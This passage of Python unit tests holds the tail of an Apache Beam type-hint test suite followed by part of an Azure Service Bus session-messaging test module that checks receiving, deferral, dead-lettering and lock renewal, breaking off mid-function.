result = ['a', 'bb', 'c'] | beam.Map(repeat, 3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) # As a keyword argument. result = ['a', 'bb', 'c'] | beam.Map(repeat, times=3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) def _run_repeat_test_bad(self, repeat): # Various mismatches. with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, 'z') with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, times='z') with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, 3, 4) if not inspect.getargspec(repeat).defaults: with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat) def test_basic_side_input_hint(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times self._run_repeat_test(repeat) def test_keyword_side_input_hint(self): @typehints.with_input_types(str, times=int) def repeat(s, times): return s * times self._run_repeat_test(repeat) def test_default_typed_hint(self): @typehints.with_input_types(str, int) def repeat(s, times=3): return s * times self._run_repeat_test(repeat) def test_default_untyped_hint(self): @typehints.with_input_types(str) def repeat(s, times=3): return s * times # No type checking on dfault arg. self._run_repeat_test_good(repeat) @OptionsContext(pipeline_type_check=True) def test_varargs_side_input_hint(self): @typehints.with_input_types(str, int) def repeat(s, *times): return s * times[0] result = ['a', 'bb', 'c'] | beam.Map(repeat, 3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) # TODO(robertwb): Support partially defined varargs. # with self.assertRaises(typehints.TypeCheckError): # ['a', 'bb', 'c'] | beam.Map(repeat, 'z') def test_deferred_side_inputs(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times p = TestPipeline() main_input = p | beam.Create(['a', 'bb', 'c']) side_input = p | 'side' >> beam.Create([3]) result = main_input | beam.Map(repeat, pvalue.AsSingleton(side_input)) assert_that(result, equal_to(['aaa', 'bbbbbb', 'ccc'])) p.run() bad_side_input = p | 'bad_side' >> beam.Create(['z']) with self.assertRaises(typehints.TypeCheckError): main_input | 'bis' >> beam.Map(repeat, pvalue.AsSingleton(bad_side_input)) def test_deferred_side_input_iterable(self): @typehints.with_input_types(str, typehints.Iterable[str]) def concat(glue, items): return glue.join(sorted(items)) p = TestPipeline() main_input = p | beam.Create(['a', 'bb', 'c']) side_input = p | 'side' >> beam.Create(['x', 'y', 'z']) result = main_input | beam.Map(concat, pvalue.AsIter(side_input)) assert_that(result, equal_to(['xayaz', 'xbbybbz', 'xcycz'])) p.run() bad_side_input = p | 'bad_side' >> beam.Create([1, 2, 3]) with self.assertRaises(typehints.TypeCheckError): main_input | 'fail' >> beam.Map(concat, pvalue.AsIter(bad_side_input)) class CustomTransformTest(unittest.TestCase): class CustomTransform(beam.PTransform): def _extract_input_pvalues(self, pvalueish): return pvalueish, (pvalueish['in0'], pvalueish['in1']) def expand(self, pvalueish): return {'out0': pvalueish['in0'], 'out1': pvalueish['in1']} # TODO(robertwb): (typecheck) Make these the default? 
def with_input_types(self, *args, **kwargs): return WithTypeHints.with_input_types(self, *args, **kwargs) def with_output_types(self, *args, **kwargs): return WithTypeHints.with_output_types(self, *args, **kwargs) test_input = {'in0': ['a', 'b', 'c'], 'in1': [1, 2, 3]} def check_output(self, result): self.assertEqual(['a', 'b', 'c'], sorted(result['out0'])) self.assertEqual([1, 2, 3], sorted(result['out1'])) def test_custom_transform(self): self.check_output(self.test_input | self.CustomTransform()) def test_keyword_type_hints(self): self.check_output( self.test_input | self.CustomTransform().with_input_types( in0=str, in1=int)) self.check_output( self.test_input | self.CustomTransform().with_input_types(in0=str)) self.check_output( self.test_input | self.CustomTransform().with_output_types( out0=str, out1=int)) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(in0=int) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_output_types(out0=int) def test_flat_type_hint(self): # Type hint is applied to both. ({'in0': ['a', 'b', 'c'], 'in1': ['x', 'y', 'z']} | self.CustomTransform().with_input_types(str)) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(str) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(int) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_output_types(int) if __name__ == '__main__': unittest.main()
#------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. #-------------------------------------------------------------------------- import logging import concurrent import sys import os import pytest import time import uuid from datetime import timedelta from azure.servicebus import ( ServiceBusClient, AutoLockRenewer, ServiceBusMessage, ServiceBusReceivedMessage, ServiceBusReceiveMode, NEXT_AVAILABLE_SESSION, ServiceBusSubQueue ) from azure.servicebus._common.utils import utc_now from azure.servicebus.exceptions import ( ServiceBusConnectionError, ServiceBusAuthenticationError, ServiceBusError, SessionLockLostError, MessageAlreadySettled, OperationTimeoutError, AutoLockRenewTimeout ) from devtools_testutils import AzureMgmtTestCase, CachedResourceGroupPreparer from servicebus_preparer import ( CachedServiceBusNamespacePreparer, CachedServiceBusQueuePreparer, ServiceBusTopicPreparer, ServiceBusQueuePreparer, ServiceBusSubscriptionPreparer ) from utilities import get_logger, print_message, sleep_until_expired _logger = get_logger(logging.DEBUG) class ServiceBusSessionTests(AzureMgmtTestCase): @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_peeklock(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) sender = sb_client.get_queue_sender(servicebus_queue.name) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) with sender, receiver: for i in range(3): message = ServiceBusMessage("Handler message no. 
{}".format(i)) message.partition_key = 'pkey' message.session_id = session_id message.partition_key = session_id message.application_properties = {'key': 'value'} message.subject = 'label' message.content_type = 'application/text' message.correlation_id = 'cid' message.message_id = str(i) message.to = 'to' message.reply_to = 'reply_to' message.reply_to_session_id = 'reply_to_session_id' with pytest.raises(ValueError): message.partition_key = 'pkey' sender.send_messages(message) with pytest.raises(ServiceBusError): receiver = sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5)._open_with_retry() count = 0 received_cnt_dic = {} for message in receiver: print_message(_logger, message) assert message.delivery_count == 0 assert message.application_properties assert message.application_properties[b'key'] == b'value' assert message.subject == 'label' assert message.content_type == 'application/text' assert message.correlation_id == 'cid' assert message.partition_key == session_id assert message.to == 'to' assert message.reply_to == 'reply_to' assert message.sequence_number assert message.enqueued_time_utc assert message.session_id == session_id assert message.reply_to_session_id == 'reply_to_session_id' count += 1 receiver.complete_message(message) if message.message_id not in received_cnt_dic: received_cnt_dic[message.message_id] = 1 sender.send_messages(message) else: received_cnt_dic[message.message_id] += 1 assert received_cnt_dic['0'] == 2 and received_cnt_dic['1'] == 2 and received_cnt_dic['2'] == 2 assert count == 6 session_id = "" sender = sb_client.get_queue_sender(servicebus_queue.name) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) with sender, receiver: for i in range(3): message = ServiceBusMessage("Handler message no. 
{}".format(i)) message.partition_key = 'pkey' message.session_id = session_id message.partition_key = session_id message.application_properties = {'key': 'value'} message.subject = 'label' message.content_type = 'application/text' message.correlation_id = 'cid' message.message_id = str(i) message.to = 'to' message.reply_to = 'reply_to' message.reply_to_session_id = 'reply_to_session_id' with pytest.raises(ValueError): message.partition_key = 'pkey' sender.send_messages(message) with pytest.raises(ServiceBusError): receiver = sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5)._open_with_retry() count = 0 received_cnt_dic = {} for message in receiver: print_message(_logger, message) assert message.delivery_count == 0 assert message.application_properties assert message.application_properties[b'key'] == b'value' assert message.subject == 'label' assert message.content_type == 'application/text' assert message.correlation_id == 'cid' assert message.partition_key == session_id assert message.to == 'to' assert message.reply_to == 'reply_to' assert message.sequence_number assert message.enqueued_time_utc assert message.session_id == session_id assert message.reply_to_session_id == 'reply_to_session_id' count += 1 receiver.complete_message(message) if message.message_id not in received_cnt_dic: received_cnt_dic[message.message_id] = 1 sender.send_messages(message) else: received_cnt_dic[message.message_id] += 1 assert received_cnt_dic['0'] == 2 and received_cnt_dic['1'] == 2 and received_cnt_dic['2'] == 2 assert count == 6 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_queue_client_conn_str_receive_handler_receiveanddelete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Handler message no. 
{}".format(i), session_id=session_id) sender.send_messages(message) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as receiver: for message in receiver: messages.append(message) assert session_id == receiver._session_id assert session_id == message.session_id with pytest.raises(ValueError): receiver.complete_message(message) assert not receiver._running assert len(messages) == 10 time.sleep(5) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as session: for message in session: messages.append(message) assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_stop(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Stop message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: assert session_id == receiver.session.session_id assert session_id == message.session_id messages.append(message) receiver.complete_message(message) if len(messages) >= 5: break assert receiver._running assert len(messages) == 5 for message in receiver: assert session_id == receiver.session.session_id assert session_id == message.session_id messages.append(message) receiver.complete_message(message) if len(messages) >= 5: break assert not receiver._running assert len(messages) == 6 @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_no_session(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False, retry_total=1) as sb_client: with pytest.raises(OperationTimeoutError): with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=10,) as session: pass @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_connection_failure_is_idempotent(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): #Technically this validates for all senders/receivers, not just session, but since it uses session to generate a recoverable failure, 
putting it in here. with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: # First let's just try the naive failure cases. receiver = sb_client.get_queue_receiver("THIS_IS_WRONG_ON_PURPOSE") with pytest.raises(ServiceBusAuthenticationError): receiver._open_with_retry() assert not receiver._running assert not receiver._handler sender = sb_client.get_queue_sender("THIS_IS_WRONG_ON_PURPOSE") with pytest.raises(ServiceBusAuthenticationError): sender._open_with_retry() assert not receiver._running assert not receiver._handler # Then let's try a case we can recover from to make sure everything works on reestablishment. receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION) with pytest.raises(OperationTimeoutError): receiver._open_with_retry() session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: sender.send_messages(ServiceBusMessage("test session sender", session_id=session_id)) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=5) as receiver: messages = [] for message in receiver: messages.append(message) assert len(messages) == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_inactive_session(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as session: for message in session: messages.append(message) assert session._running assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) for i in range(10): message = ServiceBusMessage("Deferred message no. 
{}".format(i), session_id=session_id) sender.send_messages(message) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) assert message.lock_token assert not message.locked_until_utc assert message._receiver with pytest.raises(TypeError): receiver.renew_message_lock(message) receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) messages = [ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) for i in range(10)] sender.send_messages(messages) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) receiver.dead_letter_message(message, reason="Testing reason", error_description="Testing description") count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, sub_queue=ServiceBusSubQueue.DEAD_LETTER, max_wait_time=5) as receiver: for message in receiver: count += 1 print_message(_logger, message) assert message.dead_letter_reason == 'Testing reason' assert message.dead_letter_error_description == 'Testing description' assert message.application_properties[b'DeadLetterReason'] == b'Testing reason' assert message.application_properties[b'DeadLetterErrorDescription'] == b'Testing description' receiver.complete_message(message) assert count == 10 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) messages = 
[ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) for i in range(10)] for message in messages: sender.send_messages(message) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) with pytest.raises(ValueError): receiver.complete_message(message) with pytest.raises(ServiceBusError): deferred = receiver.receive_deferred_messages(deferred_messages) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: deferred_messages = [] session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: count = 0 for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 deferred = receiver.receive_deferred_messages(deferred_messages) with pytest.raises(MessageAlreadySettled): receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_receive_with_retrieve_deadletter(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, prefetch_count=10) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Dead lettered message no. 
{}".format(i), session_id=session_id) sender.send_messages(message) count = 0 messages = receiver.receive_messages() while messages: for message in messages: print_message(_logger, message) receiver.dead_letter_message(message, reason="Testing reason", error_description="Testing description") count += 1 messages = receiver.receive_messages() assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, sub_queue = ServiceBusSubQueue.DEAD_LETTER, max_wait_time=5) as receiver: count = 0 for message in receiver: print_message(_logger, message) receiver.complete_message(message) assert message.dead_letter_reason == 'Testing reason' assert message.dead_letter_error_description == 'Testing description' assert message.application_properties[b'DeadLetterReason'] == b'Testing reason' assert message.application_properties[b'DeadLetterErrorDescription'] == b'Testing description' count += 1 assert count == 10 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_browse_messages_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) session_id_2 = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id_2) sender.send_messages(message) with pytest.raises(ServiceBusError): with sb_client.get_queue_receiver(servicebus_queue.name): messages = sb_client.peek_messages(5) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.peek_messages(5) assert len(messages) == 5 assert all(isinstance(m, ServiceBusReceivedMessage) for m in messages) for message in messages: print_message(_logger, message) with pytest.raises(ValueError): receiver.complete_message(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id_2) as receiver: messages = receiver.peek_messages(5) assert len(messages) == 3 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_browse_messages_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5, session_id=session_id) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. 
{}".format(i), session_id=session_id) sender.send_messages(message) messages = receiver.peek_messages(5) assert len(messages) > 0 assert all(isinstance(m, ServiceBusReceivedMessage) for m in messages) for message in messages: print_message(_logger, message) with pytest.raises(ValueError): receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_renew_client_locks(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) messages = [] locks = 3 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=10) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(locks): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages.extend(receiver.receive_messages()) recv = True while recv: recv = receiver.receive_messages(max_wait_time=5) messages.extend(recv) try: for m in messages: with pytest.raises(TypeError): expired = m._lock_expired assert m.locked_until_utc is None assert m.lock_token is not None time.sleep(5) initial_expiry = receiver.session._locked_until_utc receiver.session.renew_lock(timeout=5) assert (receiver.session._locked_until_utc - initial_expiry) >= timedelta(seconds=5) finally: receiver.complete_message(messages[0]) receiver.complete_message(messages[1]) # This magic number is because of a 30 second lock renewal window. Chose 31 seconds because at 30, you'll see "off by .05 seconds" flaky failures # potentially as a side effect of network delays/sleeps/"typical distributed systems nonsense." In a perfect world we wouldn't have a magic number/network hop but this allows # a slightly more robust test in absence of that. 
assert (receiver.session._locked_until_utc - utc_now()) <= timedelta(seconds=60) sleep_until_expired(receiver.session) with pytest.raises(SessionLockLostError): receiver.complete_message(messages[2]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_conn_str_receive_handler_with_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("{}".format(i), session_id=session_id) sender.send_messages(message) results = [] def lock_lost_callback(renewable, error): results.append(renewable) renewer = AutoLockRenewer() messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10) as receiver: renewer.register(receiver, receiver.session, max_lock_renewal_duration=10, on_lock_renew_failure=lock_lost_callback) print("Registered lock renew thread", receiver.session._locked_until_utc, utc_now()) with pytest.raises(SessionLockLostError): for message in receiver: if not messages: print("Starting first sleep") time.sleep(10) print("First sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not receiver.session._lock_expired with pytest.raises(TypeError): message._lock_expired assert message.locked_until_utc is None with pytest.raises(TypeError): receiver.renew_message_lock(message) assert message.lock_token is not None receiver.complete_message(message) messages.append(message) elif len(messages) == 1: print("Starting second sleep") time.sleep(10) # ensure renewer expires print("Second sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not results sleep_until_expired(receiver.session) # and then ensure it didn't slip a renew under the wire. assert receiver.session._lock_expired assert isinstance(receiver.session.auto_renew_error, AutoLockRenewTimeout) try: receiver.complete_message(message) raise AssertionError("Didn't raise SessionLockLostError") except SessionLockLostError as e: assert isinstance(e.inner_exception, AutoLockRenewTimeout) messages.append(message) # While we're testing autolockrenew and sessions, let's make sure we don't call the lock-lost callback when a session exits. 
renewer._renew_period = 1 session = None with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10) as receiver: session = receiver.session renewer.register(receiver, session, max_lock_renewal_duration=5, on_lock_renew_failure=lock_lost_callback) sleep_until_expired(receiver.session) assert not results renewer.close() assert len(messages) == 2 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_conn_str_receive_handler_with_auto_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=True) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("{}".format(i), session_id=session_id) sender.send_messages(message) results = [] def lock_lost_callback(renewable, error): results.append(renewable) renewer = AutoLockRenewer(max_lock_renewal_duration=10, on_lock_renew_failure = lock_lost_callback) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10, auto_lock_renewer=renewer) as receiver: print("Registered lock renew thread", receiver.session._locked_until_utc, utc_now()) with pytest.raises(SessionLockLostError): for message in receiver: if not messages: print("Starting first sleep") time.sleep(10) print("First sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not receiver.session._lock_expired with pytest.raises(TypeError): message._lock_expired assert message.locked_until_utc is None with pytest.raises(TypeError): receiver.renew_message_lock(message) assert message.lock_token is not None receiver.complete_message(message) messages.append(message) elif len(messages) == 1: print("Starting second sleep") time.sleep(10) # ensure renewer expires print("Second sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not results sleep_until_expired(receiver.session) # and then ensure it didn't slip a renew under the wire. assert receiver.session._lock_expired assert isinstance(receiver.session.auto_renew_error, AutoLockRenewTimeout) try: receiver.complete_message(message) raise AssertionError("Didn't raise SessionLockLostError") except SessionLockLostError as e: assert isinstance(e.inner_exception, AutoLockRenewTimeout) messages.append(message) # While we're testing autolockrenew and sessions, let's make sure we don't call the lock-lost callback when a session exits. 
renewer._renew_period = 1 session = None with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10, auto_lock_renewer=renewer) as receiver: session = receiver.session sleep_until_expired(receiver.session) assert not results renewer.close() assert len(messages) == 2 # test voluntary halt of auto lock renewer when session is closed session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: messages = [ServiceBusMessage("{}".format(i), session_id=session_id) for i in range(10)] sender.send_messages(messages) renewer = AutoLockRenewer(max_lock_renewal_duration=100) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, prefetch_count=10, auto_lock_renewer=renewer) with receiver: received_msgs = receiver.receive_messages(max_wait_time=5) for msg in received_msgs: receiver.complete_message(msg) receiver.close() assert not renewer._renewable(receiver._session) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @CachedServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_receiver_partially_invalid_autolockrenew_mode(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with 